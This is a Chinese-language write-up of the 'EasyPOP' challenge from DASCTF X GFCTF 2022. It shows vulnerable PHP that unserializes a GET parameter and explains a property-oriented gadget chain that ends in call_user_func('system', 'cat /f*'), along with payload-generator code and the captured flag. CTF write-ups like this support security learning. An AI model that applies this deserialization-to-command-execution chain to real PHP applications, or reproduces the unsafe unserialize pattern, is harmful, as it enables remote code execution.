[DASCTF X GFCTF 2022十月挑战赛!]EasyPOP WP

php 复制代码
<?php
highlight_file(__FILE__);
error_reporting(0);

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

class show
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    public function __destruct()
    {
        if ($this->password == $this->name) {

            echo $this->hint;
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    public function getPassword()
    {
        return $this->password;
    }

    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

class secret_code
{
    protected $code;

    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    private function show()
    {
        return $this->code->secret;
    }
}


if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
    $a->setPassword(md5(mt_rand()));
} else {
    $a = new show("Ctfer");
    echo $a->show();
}
Ctfer: Duration of practice: Two and a half years

入口:pop参数传入序列化数据

出口:fine::__invoke()里的call_user_func用来执行系统命令,查看flag

利用顺序:

1.sorry::setPassword,给password赋值随机数

2.sorry::__destruct,如果name和password不相等,会调用secret_code::secret(),进而include_once "hint.php"。但是只会跳转到听歌界面,没有flag。
使用name=&password,让两者值恒等,绕过随机赋值。

3.echo $this->hint,将hint当作字符串调用。hint为show类,进入show::__toString

4.return $this->ctf->show(),ctf为secret_code类,调用secret_code::show()

5.return $this->code->secret,调用不存在的属性,code为sorry类,进入sorry::__get()

6.key赋值name,以函数调用name。key为fine类,进入fine:__invoke()

7.cmd,content分别赋值'system', 'cat /f*'

8.为了绕过fine::__wakeup,修改序列化数据(具体上网查)

payload:

构造序列化数据时可以把数据都改为public,方便操作

php 复制代码
<?php
class fine
{
    public $cmd;
    public $content;
}

class show
{
    public $ctf;
}

class sorry
{
    public $name;
    public $password;
    public $hint;
    public $key;
}

class secret_code
{
    public $code;
}

$pop=new sorry();
$pop->name=&$pop->password;
$pop->hint=new show();
$pop->hint->ctf=new secret_code();
$pop->hint->ctf->code=new sorry();
$pop->hint->ctf->code->key=new fine();
$pop->hint->ctf->code->key->cmd='system';
$pop->hint->ctf->code->key->content='cat /f*';
echo urlencode(serialize($pop));
?>

flag{2766a0c2-44c1-4547-b0b9-4cfa91609a3c}

难点:call_user_func('system', 'cat /f*');
call_user_func('system', 'ls');可以执行系统命令

相关推荐
xcLeigh1 分钟前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
梦想平凡6 分钟前
PHP 微信棋牌开发全解析:高级教程
android·数据库·oracle
白乐天_n14 分钟前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
元争栈道31 分钟前
webview和H5来实现的android短视频(短剧)音视频播放依赖控件
android·音视频
阿甘知识库1 小时前
宝塔面板跨服务器数据同步教程:双机备份零停机
android·运维·服务器·备份·同步·宝塔面板·建站
光路科技2 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全
Smile灬凉城6662 小时前
反序列化为啥可以利用加号绕过php正则匹配
开发语言·php
saynaihe2 小时前
安全地使用 Docker 和 Systemctl 部署 Kafka 的综合指南
运维·安全·docker·容器·kafka
元争栈道2 小时前
webview+H5来实现的android短视频(短剧)音视频播放依赖控件资源
android·音视频
星河梦瑾2 小时前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全